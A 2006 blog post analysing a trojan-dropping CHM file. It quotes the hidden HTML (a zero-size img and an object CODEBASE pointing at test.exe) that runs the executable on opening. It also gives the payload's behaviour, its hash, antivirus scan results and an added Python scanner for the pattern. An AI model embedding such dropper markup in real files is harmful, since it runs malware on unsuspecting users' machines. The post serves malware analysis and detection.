Purpleendurer@CSDN


[06-20] A CHM file that drops/runs an EXE file: Trojan.DL.Inject.fg (TrojanDownloader.Small.mp) (3rd edition)

Original work by endurer

2006-06-20 3rd edition. Added: Rising 18.32.10 reports test.exe as Trojan.DL.Inject.fg
2006-06-19 2nd edition. Added: Jiangmin KV reports test.exe as TrojanDownloader.Small.mp
2006-06-18 1st edition

A CHM file sent to me by a net friend contains the following code:

<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>


As a result, opening this CHM file drops and runs a file named test.exe.
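The embedding pattern above (a zero-size `<img>` whose `src` is an executable, plus an `<object>` whose `CODEBASE` is that same executable) can be checked for mechanically. The following is an added example, not code from the original post; it assumes the HTML pages have already been extracted from the CHM, and the rule names and extension list are choices made for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions treated as executable (an assumption for this example; extend as needed).
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")

# The snippet quoted on this page, embedded as sample input.
SAMPLE = '''<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>'''

def is_exec_ref(value):
    """True if a URL or path points at an executable; '#version=...' suffixes are ignored."""
    value = value or ""
    try:
        path = urlsplit(value).path
    except ValueError:  # malformed URL: fall back to the raw string
        path = value
    return path.lower().endswith(EXEC_EXTS)

class ChmPageScanner(HTMLParser):
    """Records (line, rule, reference) for tags that load an executable."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag and attribute names arrive lower-cased
        line = self.getpos()[0]
        if tag == "object" and is_exec_ref(a.get("codebase")):
            self.findings.append((line, "object-codebase-exe", a["codebase"]))
        elif tag == "img" and is_exec_ref(a.get("src")):
            hidden = a.get("width") == "0" and a.get("height") == "0"
            rule = "hidden-img-src-exe" if hidden else "img-src-exe"
            self.findings.append((line, rule, a["src"]))

def scan_html(text):
    """Return findings for one HTML page extracted from a CHM."""
    scanner = ChmPageScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for line, rule, ref in scan_html(SAMPLE):
        print(f"line {line}: {rule} -> {ref}")
```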

test.exe is written in Microsoft Visual C++ and packed with UPX. It injects a thread into explorer.exe and attempts to access: hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing
